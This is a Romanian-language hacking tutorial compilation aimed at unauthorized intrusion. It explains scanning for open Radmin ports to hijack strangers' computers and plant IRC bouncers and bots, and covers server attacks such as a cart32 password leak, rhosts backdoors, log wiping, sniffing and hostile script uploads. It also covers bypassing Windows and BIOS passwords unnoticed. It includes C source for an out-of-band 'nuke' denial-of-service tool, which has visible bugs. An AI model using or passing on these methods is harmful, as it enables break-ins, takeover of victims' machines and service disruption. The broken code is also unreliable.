BA DACA AVETI CEVA TUTORIALE CARE MERITA IMI DATI UN MAIL SI LE URC !!! |
1. Ce este un BNC ?
PsyBNC este un bouncer(IRC proxy). Un bouncer este un client de IRC care sta pe
IRC atat timp cat calculatorul pe care ruleaza psyBNC-ul este online si are
conxiune la internet. PsyBNC fuctioneaza asemenea unui tunel intre tine si IRC.
Cand te conectezi la psyBNC-ul tau, de fapt te conectezi la calculatorul (IP-ul)
pe care ruleaza psyBNC-ul. Apoi, de pe calculatorul acela te conectezi la IRC.
tu ---------> calculator (server) ---------> IRC
2. Cum fac un BNC ?
Mai intai ai nevoie de 3 lucruri:
- un IP scanner
- Radmin
- arhiva de BNC pentru Windows
Daca nu ai accese programe le poti downloada din link-urile de mai jos:
Program Marime Download
Angry IP Scanner 103 Kb Í
Radmin 2.1 1.31 Mb Í
arhiva BNC 621 Kb Í
Dupa ce ai downloadat programele de mai sus trebui sa incepi sa scanezi IP-uri
vulnerabile (adica IP-uri care au portul 4899 deschis).
Mai intai trebuie sa iti setezi scanner-ul sa scaneze doar IP-uri cu portul 4899
deschis. Deschide IP Scanner apoi du-te la Options si apoi la Select Ports. Aici
introdu 4899 la Ports si apoi da OK. Mai departe trebuie setat sa arate in lista
de scanare doar IP-urile cu portul 4899 deschis. Du-te la Options apoi iar la
Options si bifeaza Only open ports apoi apasa OK & Save.
Acum trebuie introdus un "range" care trebuie trebuie scanat. Adica de la ce IP
sa inceapa sa scaneze si la ce IP sa termine.
Exemplu: 81.196.68.0 - 81.196.70.0
Recomandare: Poti scana orice clasa de IP-uri. Personal va recomand cele care
incep cu 202, 203, 210, 211, 212, 213, 217, 220 si altele.
In timp ce scanezi IP-urile trebuie sa setezi arhiva de BNC. Deschide fisierul
psybnc.conf cu un editor text (Notepad sau Wordpad). Editeaza linia:
PSYBNC.SYSTEM.PORT1=31337
unde in loc de 31337 pui pe ce port te vei conecta la BNC sau il poti lasa asa.
Exemple de alte porturi: 3128, 31337, 50001 si altele.
Verifica daca ai gasit IP-uri cu portul 4899 deschis. Daca da, incearca sa te
conectezi la IP folosind Radmin. Deschide Radmin Viewer, apoi du-te la
Connection si mai departe da Connect to. Introdu la IP adress IP-ul care are
portul 4899 deschis iar la Connection Type bifeaza Telnet. Daca s-a deschis
fereastea de Telnet fara sa ceara parola inseamna ca tocmai ai gasit un IP bun
pe care iti poti pune fisierele BNC-ului.
Atentie:Calculatoarele cu Win 98 sau 95 nu sunt bune pentru facut BNC deoarece
nu merge conexiunea Radmin - Telnet, deci nu vei putea rula psyBNC-ul.
Ar fi bine daca ai parola respectivul IP astfel incat sa nu ai decat tu acces.
IP-ul se poate parola folosind urmatoarea comanda:
r_server /port:4899 /pass:parola /save
unde in loc de parola pui ce parola vrei tu.
Acum trebuie sa urci fisierele botului pe calculatorul pe care tocmai l`ai
parolat. Deschizi iar Radmin Viewer, apoi du-te la Connection si mai departe da
Connect to. Introdu la IP adress IP-ul care are portul 4899 deschis iar la
Connection Type bifeaza File Transfer. In IP-ul gazda creeaza un director cu
numele BNC de exmplu, preferabil in directorul de la Windows.
Exemplu: C:\WINNT\System32\BNC
Selecteaza fisierele care vrei sa le transferi in directorul BNC si apoi apasa
Transfer. Dupa ce termina de transferat inchide conexiunea Radmin File Transfer
si deschide alta conexiune de tip Telnet.
Intra in directorul BNC pe care l`ai creat folosind comenzile DOS:
cd dir - pentru a intra intr-un anume director.
cd.. - pentru a iesi din directorul curent un nivel mai sus (up one level).
Odata ajuns in directorul unde ai pus fisierele la BNC ruleaza fisierul
psybnc.exe si vei primi confirmare ca BNC-ul ruleaza.
Deschide apoi mIRC si scrie acolo urmatoare comanda pentru a te conecta la BNC:
/server IP:port
unde IP este IP-ul pe care ai rulat arhiva de BNC iar port este portul pe care
l-ai introdus tu atunci cand ai editat psybnc.conf (31337 in cazul in care ai
lasat portul default).
Fiindca este prima oara cand te conectezi la BNC ar trebui sa iti ceara o parola.
Parola pe care o introduci acum iti va fi ceruta de fiecare data cand te
conectezi la BNC. Trebuie sa tii cont si cu ce ident te-ai conectat pentru prima
oara la BNC pentru ca daca il vei schimba pe parcurs nu te vei mai putea conecta
la BNC.
Ca se conectezi BNC-ul va trebui sa introduci niste servere.
/addserver eu.undernet.org:
/addserver us.undernet.org:
/addserver fairfax.va.us.undernet.org:
/addserver ede.nl.eu.undernet.org:
Poti adauga cate servere doresti tu.
Lista cu toate comenzile BNC-ului o poti afla tastand:
/bhelp
Tutorial Emech Bot
Ca sa faci un eMECH trebuie sa urmezi pasii de mai jos .
1) Download-eaza programele de mai jos :
a) Angry IP Scanner
b) Remote Administrator ( Radmin )
c) TitanZoneBOT
2) Odata terminata download-area deschide Angry IP Scanner si apucate de scanat
IP-uri . Cum faci asta ? ... e simplu ... dupa ce ai deschis programul apasa ALT
+ O + P si la sectiunea de sus " Ports " scrie portul 4899 . O alta setare utila
la scanner este sa arate in lista numai IP-urile cu portul 4899 deschis . Pt. a
il face sa arate doar IP-urile cu portul 4899 deschis apasa CTRL + O si bifeaza
" Only open ports " iar dupaia apasa " Ok & Save " .
3) Acum selecteaza clasa de IP-uri pe care sa scanezi unde scrie "IP range"
introdu de la ce IP pana la ce IP vrei sa scanezi .
Exemplu:
190.0.0.0 to 194.0.0.0
4) Dupa ce ai gasit un IP cu port-ul 4899 deschis incearca sa te conectezi la el
folosind Remote Administrator .
Remote Administrator are mai multe tip-uri de conectare la server :
1. Full control ( Permite controlarea absoluta a desktop-ului )
2. View only ( Poti vedea actiunile de pe desktop )
3. Telnet ( Permite executarea unor programe )
4. File transfer ( Schimb fisiere intre server/client )
5. Shutdown ( Permite inchidere/resetarea server-ului )
Mai intai incearca sa te conectezi la IP folosind conexiunea " telnet " . Daca
se deschide o fereastra de tip telnet fara ca inainte sa ceara vreo parola
tocmai ai gasit un IP bun care poate deveni gazda pentru psyBNC-ul tau . Si daca
tot nu era parolat , paroleaza-l tu , ca in viitor sa nu-l poata "controla" si
altcineva . Pentru al parola scrie in fereastra telnet :
r_server /port:4899 /pass:ce_parola_vrei /save
Ar trebui ca urmatoarea data cand o sa vrei sa intri pe server sa-ti ceara
parola .
5) Acum trebuie setati botii . Editeaza fisierele "Mech.set" si "WinMech.Users"
folosind editorul tau text preferat , sau daca nu ai unul foloseste WordPad-ul
din Windows sau NotePad-ul .
In fisierul "Mech.set" schimba nick-ul cu care bot-ul se va conecta la server,
iar la "WinMech.Users" schimba "Handle" cu nick-ul tau . iar la "Mask" pune
maska ta de pe net .
Exemplu de maska : *!*@TitanZone.users.undernet.org
Salveaza fisierele . Acum ... urca tot continutul bot-ului pe server-ul gasit .
Faceti asta folosind conexiunea Remote Adminstrator File transfer ( explicatia o
gasiti mai sus ) . Dupa ce ati terminat de urcat botul executati-l folosind
Remote Adminstrator ,Telnet , intrati cu telnet in directorul unde ati copiat
botul si tastati " TitaZone.bat " dupaia , inchide fereastra telnet si asteapta
ca bot-ul sa intre pe server ( Undernet ) , in canalul #Titan . Il poti baga si
pe alte canale cu comanda !join #canal .
alta hacereala ...
1. Sfaturi pentru cei ce folosesc mIRC-ul
2. Cum sa detii controlul asupra celor de pe IRC
Metode clasice de atac asupra oricarui server
Metode clasice de atac asupra oricarui server
Strangerea de informatii este vitala pentru a putea obtine acces pe un server.
Voi da in continuare
10 metode de adunare a informatiilor despre server.com.
1)Pentru a afla IP-ul serverului tot ce trebuie sa faceti este tastati:
c:/>windows>tracert -j server.com
Acum este necesar sa vedem daca are optiunea "file and print share enabled",si
daca sistemul de
operare este linux sau windows nt.
c:/>windows>nbtstat -A ipadress unde ipadress este adresa de IP gasita la pasul
anterior. Comanda va lista
numele tuturor userilor din memoria cache daca serverul este prost configurat.
2)Trebuie sa aflam serviciile care ruleaza pe server:ftp,telnet,smtp,finger
precum si vesiunea lor.
c:/>windows>ftp server.com
Daca are serviciu ftp va aparea ceva de genul "connected to server running
WUFTPD...".Am aflat
versiunea de server ftp care ruleaza pe portul 23. Deschidem browserul de web si
introducem
http://www.server.com/lalalalala.htm. Vom primi un raspuns de genul "file not
found on this server.Server
running apache.."Am aflat si versiunea serverului pe care sunt stocate paginile
web.
La fel procedam cu smtp pe portul 25.c:/>windows>telnet qmail.server.com 25 La
fel vom primi un mesaj
asemanator.
Cunoscand toate serviciile care ruleaza pe server si versiunea acestora putem
foarte usor gasi un
exploit pentru ele.
3)Scanam toate bugurile cunoscute in cgi-bin,cgi-win si scripts.
Cel mai bun program care face acest lucru este Cgifound. Spre exemplu un fraier
mi-a trimis
deunazi un link catre un server vulnerabil si anume www.server.com.
Vulnerabilitea consta in programul
cart32.exe care se gaseste in cgi-bin.exploitul este:
www.server.com/cgi-bin/cart32.exe/cart32clientlist
Parola poate fi orice cuvant si toate parolele userilor sunt listate. Este un
bug cunoscut pentru
cart32.exe. Pentru a vedea insa versiunea de cart32 introduceti in browser:
www.server.com/cgi-bin/cart32.exe
Foarte multe informatii despre vulnerabilitatile acestui program gasiti pe:
www.packetstorm.securify.com tastand in motorul de cautare 'card32' sau 'card'.
Este relativ usor sa afli parola unui server, asta o poate face kiddie script
insa este mai greu
sa nu lasi urme. Si mai greu este sa instalezi un backdoor pe server ca sa poti
intra cand doresti.
4)Instalarea unui backdoor pe server se face in functie de sistemul de operare.
Pentru Unix:
Toti userii care au acces la serer sunt pastrati in fisierul etc/rhosts. Dupa ce
am patruns inauntru
editam fisierul etc/rhosts in felul urmator: #ed etc/rhosts?somesite.com
someuser*w*q Sau mai simplu
daca nu cunoasteti Unix este sa descarcati fisierul etc/rhosts si sa adaugati
linia:somesite.com semeuser
Asta inseamna ca orice utilizator de pe site-ul somesite.com se poate conecta
folosind
comanda 'rlogin' si userul 'someuser'. Frumos,nu?
Pentru NT:
Trebuie adaugat un cont in fisierul *.sam folosind programul 'net'.Mai multe
amanunte gasiti pe
packetstorm.securify.com tastand 'NT'. Evident acest truc este detectabil de
administratorul retelei
dar temporar este bun pentru ca va ajuta sa obtineti acces la radacina. Spre
exemplu sub NT luati
fisierele *.sam si decriptati-le. Sub Unix rulati un script care confera drept
de root(SuID shell).
Apoi dupa ce am obtinut toate parolele si informatiile dorite trebuie sa
indepartam orice urma a
'vizitei' noastre pentru ca administratorul sa nu se prinda si sa putem intra
oricand. Urmele se sterg
indepartand IP-ul nostru din fisierele '*.log'. Sub Unix fisierul etc/inetd.conf
contine toate serviciile
care ruleaza pe server precum si setarile acestora. Ce s-ar intampla daca
modificam temporar aceste
setari? :)
5)O alta metoda cunoscuta de a obtine accesul pe un server este metoda
sniffingului.
Un sniffer este un program care monitorizeaza traficul pe retea si asculta pe un
anume port
indicat de utilizator. Cand cineva vrea sa se conecteze la serverul de mail
pentru a-si citi mesajele
parola si userul sunt interceptate si trimise la persoana care are snifferul in
functiune. Un sniffer foarte
bun este Buttsniff.
Il gasiti pe www.packetstorm.securify.com. Iata cum functioneaza:
c:/>buttsniff -l 0 fisier.dmp p fisier.foo
Sa analizam putin acesta comanda: fisier.dmp este fisierul care va contine
datele capturate de
sniffer. Fisierul fisier.foo contine comenzi sau mai bine zis instructiuni.
Continutul aproximativ al unui fisier.foo:
-----------------------------*.*.*.*122.1.1.4+25----------------------------
Asta inseamna ca este monitorizat serverul 122.1.1.4 pe portul 25 iar celelalte
porturi sunt
excluse. Un fisier.foo gol inseamna ca vreti sa colectti toate datele care vin/pleaca
de la server.
Mai multe instructiuni gasiti in fisierul readme.txt.
6)O alta metoda de a obtine acces este metoda numita 'ftp bounch attack'
Sa explic foarte pe scurt aceasta metoda:
Un server ftp A nu permite acces anonim decat unui server ftp B considerat de
incredere,
probabil din aceeasi retea. Serverul ftp B are un cont 'guest' activat. Se poate
patrunde in A prin B
folosind un script cu comenzi ftp ase-manator celui de mai jos: quo "USER
annonymous"quo
"PASS gogo@lala.com"quo "pasv"
...........Mai multe informatii pe astalavista.
7)Odata patrunsi intr-un server ftp trebuie sa stim adresa exacta radacinii, de
obicei serverul
este instalat pe o ale virtuala. Serverul www.ipswitch.com are aceasta
vulnerabilitate:
www.ipswitch.com/_vti_pvt/shtml si primim drept raspuns calea exacta si reala a
serverului. Acum
devine banal:
ftp server.comuser:ftppassword:guest
dir ---sa vedem la ce avem acces,poate avem acces la cgi-bin--
cd --calea aflata inainte--(c:/inet/root...)put program.exequit
8)O alta vulnerabilitate este comanda PUT. Daca serverul este configurat prost:
c:/>windows/telnet server.com 80PUT /scripts/script_ostil.asp HTTP/1.0 --corpul
scriptului
--/n/n/n
Dupa aceea il executam din browser:www.server.com/script/script_ostil.asp.
Portul poate sa
nu fie 80 ci 8080 sau 8000 depinde de situatie. Trebuie intai sa vedem unde
ruleaza pagini web.
9)O alta metoda,de data asta pentru profesionisti este urmarirea datagramelor
sau a pachetelor de date care "intra in server". O mare companie a fost atacata
in felul acesta cu
ajutorul comenzii "SYN". Nu am timp sa dau detalii, poate intr-un alt tutorial,
cititi articolele de pe
astalavista, tastati 'tcp'.
10) Un program de nuke care intrerupe conexiunea la Internet,care exemplifica
conceptul
de dos attack. Ideea este ca daemonul care ruleaza pe un anumit port nu poate
face fata la cereri
repetate. Programul este facut in Borland C++.
Compilati-l cu borland c++ ,cu alt compilator nu cred ca merge:nuke.cpp
-------------------------------------------
#include <conio.h>
#include <stdio.h>
#include <winsock.h>struct
{
int port; char *targetIP;
int NumOfAttact, BufSize;} parm;void Pause(void)
{
cprintf ("Apasati orice tasta pentru a renunta...");
getch();
cprintf ("\r\n");
}
int CheckWinsock()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(1, 1);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) return err;
if ( LOBYTE( wsaData.wVersion ) != 1 || HIBYTE( wsaData.wVersion ) != 1 )
{ WSACleanup(); return -1;
} return 0;
}
void ParseIP(char* des, char *theIP)
{ unsigned int val; char i;
for (i = 0; i < 4; i++)
{
if (*theIP != '\0')
{ val = 0;
while (*theIP != '\0' && *theIP != '.')
{ val *= 10;
val += *theIP - '0'; theIP++;
}
des[i]= (char)val;
if (*theIP != '\0') theIP++;
}
}
}
void ParseParm(int argc, char* argv[] )
{ char * value;
for (int i=1; i<argc; i++)
{
if (argv[i][0]=='/')
{
argv[i][1]= (char)toupper(argv[i][1]);
value = &argv[i][2];
switch (argv[i][1])
{case 'P': parm.port = atoi(value);
break;
case 'T': parm.targetIP=value;
break;
case 'N': parm.NumOfAttact = atoi(value);
break;
case 'S': parm.BufSize = atoi(value);
break;
}
}
}}
int main(int _argc, char* _argv[] )
{ int i, errcode; char *tempbuf;
SOCKET theSocket;
sockaddr theAddr;
cprintf ("folosire : Nuke [/Pport] [/Ttarget] [/Nnum] [/Ssize]\r\n"
" port : portul tinta, folositi 139.\r\n"
" target: adresa iP \"a.b.c.d\".\r\n"
" num: numarul de atacuri, implicit 10.\r\n"
" size: numarul de biti in fiecare atac, implicit 1024.\r\n\n");
if (CheckWinsock())
{ cprintf ("nu merge conexiunea!\n");
Pause();
return 1;
}
theSocket= socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (theSocket==-1)
{
cprintf ("nu merge conexiunea!\r\n");
Pause();
WSACleanup();
return 2;
}
cprintf ("folosim socket-ul: %d\r\n", theSocket);
parm.port = 139;
parm.targetIP= NULL;
parm.NumOfAttact = 10;
parm.BufSize = 1024;
ParseParm(_argc, _argv);
if (parm.targetIP==NULL)
{ parm.targetIP = (char*) malloc(256);
cprintf ("Introduceti Ip-ul: "); scanf ("%s", parm.targetIP);
cprintf ("\r\n"); } theAddr.sa_family = AF_INET;
theAddr.sa_data[0]= (char)(parm.port/256);
theAddr.sa_data[1]= (char)(parm.port%6);
ParseIP(&theAddr.sa_data[2], parm.targetIP;
cprintf ("conexiune la %s pe portul: %d\r\n", parm.targetIP, parm.port);
errcode = connect (theSocket, &theAddr, sizeof(sockaddr));
if (errcode){
cprintf ("Eroare.\r\nVerificati daca portul este 'pazit' de un daemon.\r\n");
Pause();
WSACleanup();
return 1;
}
cprintf ("STATUS: Conectat!!\r\n");
tempbuf = (char*) malloc(parm.BufSize);
for (i=0; i<parm.BufSize; i++)
tempbuf[i]=0;
for (i=0; i<parm.NumOfAttact; i++)
{
errcode = send (theSocket, tempbuf, parm.BufSize, MSG_OOB);
cprintf ("Atac: %d , trimis ", i);
if (errcode==-1)
cprintf ("eroare.\r\n");
else
cprintf ("%d bytes.\r\n", errcode);
} free (tempbuf);
closesocket (theSocket);
WSACleanup();
cprintf ("gata.\r\n");
Pause();
}
Windows hacking
Gasiti aici cele mai simple metode de hackuire a windows-ului
Desigur... multi vor afirma ca metodele sunt foarte simple, insa dedic acest
eseu anume acelora care nu le cunosc. Astfel unii incepatori vor dori sa le
citeasca inainte de a trece la subiecte mai avansate ce tin de hacking. Se mai
dedica acelora care mai au inca softuri MS pe computer si nu banuiesc de
pericolul care ii paste.
Cuprins:
BIOS Passwords.
Windows Login Password.
Changing Windows Visuals.
Despre stergerea urmelor.
The Registry.
--------------------------------------------------------------------------------
1.BIOS Passwords
(Pina a trece la parola de logare in windows ar trebui sa cititi si asta)
Cele mai simple informatii pe computer cum ar fi: cit de multe si ce fel de disk
drive-uri aveti, care lucreaza si care sunt demontate, care se folosesc pentru
bootare....etc. se pastreaza in CMOS chip-ul de pe motherboard (schimbarile in
Cmos se fac din BIOS). O micuta baterie asigura cu energie Cmos-ul, astfel daca
inchideti computerul, cmos-ul pastreaza aceste informatii. O metoda obisnuita de
a intra in BIOS o reprezinta apasarea tastei Del la bootare, alte metode fiind
Ctrl+Esc, F2... Multe computere isi au configurat bios-ul asa incit la
deschiderea lui sa fie intrebata parola pc-ului. Intr-asa caz in Dialog Box
apare mesajul welcome si te intreaba parola. Nu poti sa faci disable la parola
decit daca esti in Bios, iar ca sa intri in Bios iti trebuie parola. Ce facem
atunci va intrebati? Ii facem disable. Acum pentru a face disable la parola
exista: 1) o metoda destul de populara de a trece de parola scriind default BIOS
password-ul.
Citeva parole comune sunt: Lkwpeter; j262 ; AWARD_SW; AWARD_PW; Biostar;
Multe versiuni BIOS au parola default proprie care poate fi incercata. "j262"
porneste cele mai multe versiuni de "Awards Bios" si aceasta metoda merge 80 la
suta. AWARD_SW si AWARD_PW merg pe aceleasi computere insa aici procentajul e cu
mult mai redus. Cea mai buna cale de a afla parolele bios default este de a
cauta la http://astalavista.box.sk/, care este cel mai bun search engine in ce
priveste probleme cu securitatea.
2) Cea de-a 2-a metoda va merge in cazul in care nu ati putut intra pe computer
folosind vreun default password al bios-ului. Vom incerca sa pornim bios-ul dar
sa fie incluse "default settings"-urile. Pentru aceasta va trebui sa va
rasuflecati miinecele si sa va apucati sa desfaceti un computer. Intii de toate
va trebui sa gasiti pe motherboard acea baterie de lithium rotunda care seamana
cu o moneda de argint, va trebui apoi sa scoateti bateria si dupa 30sec. s-o
puneti la loc. La unele CMOS-uri e necesara resetarea unui jumper, iar apoi dupa
5 sec. bateria trebuie pusa la loc. Sunt diferite posibilitati aici... Dupa asta
cind bootati mashina, unele versiuni Bios ar putea sa va afiseze niste erori,
spunindu-se ca biosul a fost resetat sau ca a fost corupt, s-a incercat o
falsificare, spargere... asta insa n-ar trebui sa fie o problema.
**********************************************************************************************
AVETI GRIJA: Sa umblati la Cmos sau la jumper este cu mult mai periculos decit
editarea fisierelor care alcatuiesc sistemul... Trebuie sa actionati cu o
deosebita precautie cind faceti asa chestii.
**********************************************************************************************
SMECHERIE: Pe multe computere exista "keystroke"-uri care ar putea arunca la
pamint password programul. Incercati sa bootati pc-ul, dupa care apasati tasta
ESC de 50-100 ori. E posibil sa rezulte din asta caderea password programului,
iar computerul sa continuie sa booteze si deci sa va dea acces la sistema. Cu
toate astea pe multe computere metoda asta nu va merge.
Exista alte solutii cu privire la Bios password problem: e vorba de un program
numit KillCmos la care puteti face download de pe http://astalavista.box.sk/ sau
pe http://www.koasp.com/ Exista un numar mare de password crackers pentru CMOS
pe site-uri, insa sa folosesti pe acelea facute de altii nu te-ar face sa te
simti ca tu hackuiesti pc-ul. Mi se par injositoare metodele de a te baga pe
computere la diferite organizatii, firme... folosindu-te anume de aceste
programe pentru CMOS. Exceptie ar face cazul in care este o persoana care si-a
uitat parola computerului :))))))) si nu doreste sa-l desfaca caci asta i-ar
distruge garantia de 12 luni... Intr-asa caz pentru propriul bine se poate de
folosit de acele crackuri pentru CMOS, dar sa le folosesti in scopuri nefaste,
pentru a face rau cuiva ar fi cam............
--------------------------------------------------------------------------------
2.Windows Login Password
Va veti da acum seama de ce cineva va ride in hohote atunci cind va auzi
cuvintele "securitate" si "windows" intr-aceeasi propozitie.
Pentru a trece de parola Windows, reboot-ati si asteptati mesajul"Starting
Windows 9X"
C:\> Cd windows
***************
Alte keys-uri utile care ar afecta procesul de bootare ar fi: F4, F5, F6, F8,
Ctrl+F5, Shift+F8.
***************
Ati intrat cu "cd windows" in directoria in care se afla windows-ul si trebuie
sa schimbati ceva acolo. Fisierele ce tin de parolele de logare sunt *.pwl.
Trebuie fie sa le transferati in alta parte, fie sa le stergeti, fie sa le
schimbati denumirea extensiei: ren *.pwl *xyz. Asta ar fi un exemplu. Cel mai
bine ar fi sa nu le stergeti dar sa faceti asa ca victima sa nu banuiasca ca
cineva i s-a bagat pe computer. Deci comanda "ren" de mai sus este binevenita.
Cu asta am terminat. In acea directorie Windows nu mai exista acele *.pwl si e
posibil sa va folositi de contul oricarui user la intrarea in Windows... Dupa ce
ati intrat si de veti fi curiosi veti observa ca in C:\windows s-au format alte
*.pwl fisiere cu aceleasi denumiri, ocupind toate 688 bytes. Dupa ce ati
terminat si doriti sa iesiti, va trebui sa le stergeti pe acele nou formate care
nu v-au impiedicat la logare sa intrati in Win. Le stergeti cu "del *.pwl", dupa
care le activati din nou pe acele cu parole:
ren *.xyz *.pwl .
***************
Pentru acei care se protejeaza mai bine: exista o metoda de a dezactiva cheia F8
sau cheia de Bootare. Suntem pe cale de a ne juca cu file-urile sistema asa ca
ar fi bine sa faceti Backup la fisierele sistema. Daca nu.... Ar fi bine sa
aveti macar o discketa de bootare ca sa puteti mai apoi repara fisierul
msdos.sys.
***************
1) Gasiti fisierul msdos.sys, care se gaseste pe C:\ Apoi trebuie sa-l faceti
writeable (sa-l puteti edita de ex.) si sa-l faceti sa nu fie ascuns scriind:
C:\>attrib msdos.sys -h -w.
Dupa asta msdos.sys a devenit unul unhidden si writeable :-)
2) Deschideti fisierul msdos.sys in wordpad si veti vedea urmatoarele:
;FORMAT
[Paths]
WinDir=C:\WINDOWS
WinBootDir=C:\WINDOWS
HostWinBootDrv=C
[Options]
BootMenu=0 (default)
BootMulti=1
BootGUI=1
DoubleBuffer=1
AutoScan=1
WinVer=4.10.1998
;
;The following lines are required for compatibility with other programs.
;Do not remove them (MSDOS.SYS needs to be >1024 bytes).
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa
Pentru a dezactiva cheile functionale in timpul bootarii, direct sub [OPTIONS]
inserati urmatorul piece of code: "BootKeys=0" (fara ghilimele desigur).
Acum in loc de a insera comanda BootKeys, puteti deasemenea insera urmatoarea
comanda:
"BootDelay=0"
Exista putini oameni care cunosc comanda BootDelay, astfel ca computerul va fi
mai in siguranta cu aceasta comanda.
Dupa inserarea comenzii, salvati fisierul msdos.sys.
3) Deoarece msdos.sys este un system file important, ar trebui sa-i schimbati la
loc atributele si sa-l faceti sa fie read only si hidden:
c:\>attrib msdos.sys +h +r
***************************
Hacking Trick:
Exista alta metoda de a va rafui cu windows password-ul.
Cind va apare in fata boot meniul (care poate fi activat cu tasta F8), alegeti
Safe Mode. Puteti apasa in loc de F8 - tasta F5, cu care veti nimeri direct la
Safe Mode, fara a mai fi pusi in situatia de a alege ceva din Boot Menu.
In cazul in care Boot Keys-urile de felul F8, F5 etc... sunt disabled, trebuie
sa va folositi de o disketa boot. Dupa ce ati hackuit BIOS password-ul, intrati
in BIOS (la cele mai multe computere se poate intra in BIOS cu DEL, F2....) si
faceti ca floppy disk-ul sa fie enable (de cele mai multe ori urmatoarea este
ordinea: 1. floppy; 2.cd-rom; 3.Hd;).
Asigurati-va ca va fi posibil sa boot-ati de pe disketa.... urmeaza ms-dos
comenzile... treceti pe hard-disk:
A:\>C: ---- in felul acesta avind acces la informatia de pe hard-disk veti face
cum am aratat mai sus cu fisierele C:\Windows\*.pwl
(And Micro$oft says Windows security is quite good…gimme a break).
***************************
Daca PC-ul are ca OS Windows95 sau Windows98 si nu face parte dintr-un LAN,
atunci nici n-aveti nevoie sa va folositi de toate metodele de mai sus care tin
de windows password. Pur si simplu faceti click la Cancel cind va apare in fata
Windows Login Dialog Box-ul :))
--------------------------------------------------------------------------------
3.Changing Windows Visuals
Sa schimbati va trebui in fisierul logow.sys care se afla in C:\Windows.
Cum sa-l schimbati va intrebati? Simplu! Va duceti la PaintBrush si selectati
acolo nu un *.bmp file cu care v-ati obisnuit, dar selectati fisierul logow.sys.
Il porniti (va asigur ca se va porni din Paint)... veti observa ca este un
simplu fisier te tip BM (adica Bitmap), extensia sys ducindu-va in eroare. Apoi
urmeaza sa schimbati acel Blue Screen cu oricare altul doriti.
Si inca ceva: Puteti sa schimbati ecranul care apare atunci cind terminati
lucrul. Acel fisier este
C:\windows\logos.sys. Se face asta ca si cu logow.sys de care am vorbit mai sus.
--------------------------------------------------------------------------------
4.Despre stergerea urmelor
INFORMATIE: Orice computer conectat la Internet are un IP adress. Daca vreti sa
va conectati la acel computer, trebuie sa-i cunoasteti ip adress-ul. Insa
ip-urile sunt destul de greu de tinut minte, caci sunt alcatuite din 4 grupuri
de cifre, fiecare grup avind maximum 3 cifre. Ce e de facut? Pentru asta exista
hostname-urile. Hostname-urile sunt denumiri simple pentru ip-uri care sunt
niste "denumiri folosite de limbaj omenesc" :-)) Sa zicem ca vreti sa va duceti
la hotmail.com, atunci nu va trebui sa scrieti ip-ul, dar veti scrie hotmail.com
- usor de tinut minte. Cind contactati hostname-ul, browserul contacteaza DNS-ul
(Domain Name Server). Aceste servere "depoziteaza" hostname-urile si ip-urile.
Se mai numesc Cache DNS-uri.
URL= Universal Resource Locator - adresa paginii din world wide web
##############################
Cind scrieti URL-ul unui anumit site, ce se intimpla? Browser-ul contacteaza
website-ul pe care incercati sa-l accesati si download-este toate imaginile,
textele.... paginii pe care o vizitati si le "depoziteaza" (inmagazineaza) pe
hard-disk - ex: disk cache-ul. Deci persoana care are acces la computerul
dumneavoastra e in stare sa afle ce site-uri ati vizitat.
Sa zicem ca lucrati pentru o companie si aveti de gind sa va schimbati locul de
munca, pentru asta folosind Internetul in cautarea noii slujbe. Daca seful
vostru controleaza si doreste sa stie in ce mod se foloseste contul de internet
al companiei, atunci el n-are de facut nimic mai mult decit sa caute pe disk
cache si cu siguranta asta nu va fi deloc placut pentru d-voastra.
Cum sa stergem toate urmele de pe hard disk ? Atat Internet Explorer-ul cit si
Netscape Navigaror-ul pastreaza toate adresele (URL-urile) site-urilor pe care
le-ati vizitat recent in URL history. Deasemenea sunt pastrate toate imaginile,
html-urile, program file-urile.... in disk cache-ul.
Pentru cei ce folosesc Internet Explorer-ul:
1. Trebuie sa stearga toate entries-urile in Internet Explorer's history ( Din
fereastra IExplore - apasati pe butonul History; va aparea un frame in care vor
fi toate entries-urile; right click la url-ul care va face probleme, delete; cu
asta am terminat)
2. Trebuie sa curatati Disk Cache-ul. De fiecare data cind accesati un url, se
download-esc toate imaginile, sunetele, html-urile. Astfel daca alta data veti
accesa acelasi site, atunci nu va trebui sa se faca iarasi download la toate
acele file-uri, dar se vor porni ele din Disk Cache... Ca sa nu ramina ele in
Disk Cache - le stergeti. La IExplore se afla ele in C:\windows\Temporary
Internet Files. Le stergeti de acolo. Deasemenea daca doriti, puteti sa puneti
rezervati 0Mb pentru disk cache. In asa caz nu se va pastra nimic in /Temporary
Internet Files.
3. Cookies-urile.
Ce prezinta cookies-urile? Cookies-urile inregistreaza informatia specifica
despre user, astfel cind acel user se intoarce iarasi pe acea pagina, informatia
(cunoscuta drept informatie oficiala, stabila) este primita de pe pagina, adica
user-ul este recunoscut de dinsa. Cookies-urile se afla pe hard-disk. La
IExplore in C:\windows\Cookies.
Daca computerul este destinat mai multor utilizatori, fiecare cu parola proprie,
atunci cautati in
C:\Windows\Profiles\{Utilizator}\Cookies;
Cookies-urile sunt folosite pentru a depozita optiunile despre fiecare user
atunci cind el brows-uieste o pagina.
Baietii de la Netscape au afirmat urmatoarele despre cookies-uri:
"Acest nou mecanism reprezinta un instrument puternic care permite folosirea
noilor aplicatii scrise si facute pentru medii Web. Shopping aplications (aplicatii
ce tin de cumpararea bunurilor pe Internet), pot sa depoziteze de-acum
informatii despre items-urile selectate curent; Pentru servicii fara plata se
poate trimite inapoi informatia de inregistrare, in felul acesta utilizatorul
fiind scutit de a re-tapa user-id-ul, login-ul... la urmatoarea conectare. In
multe cazuri asta se face la preferinta clientului (trimiterea cookies-urilor)."
E tot ce trebuie sa stiti despre aceste cookies-uri care pot fi extrem de
periculoase in anumite cazuri...
Daca va folositi de Internet de la un computer strain (de la o Internet Cafe de
exemplu) ar fi bine sa cautati toate directoriile pe nume Cookies de pe
hard-disk si sa stergeti toate acele *.txt files. Cu toate ca multe din acele
cookies-uri nu va apartin ar fi bine sa le stergeti pe toate, fiind in felul
acesta convins ca si ale voastre sau sters.
Pentru acei care se folosesc Netscape Navigator-ul:
1. Stergeti toate entries-urile: In fereastra Communicator-ului va duceti la
Tools, apoi acolo la History; Stergeti entries-urile (puteti face tinind apasat
butonul "SHIFT" si sageata in sus-jos. apoi "del" si le stergeti pe toate).
2. Stergeti disk cache-ul: in C:\Program Files\Netscape\Users\default\cache -in
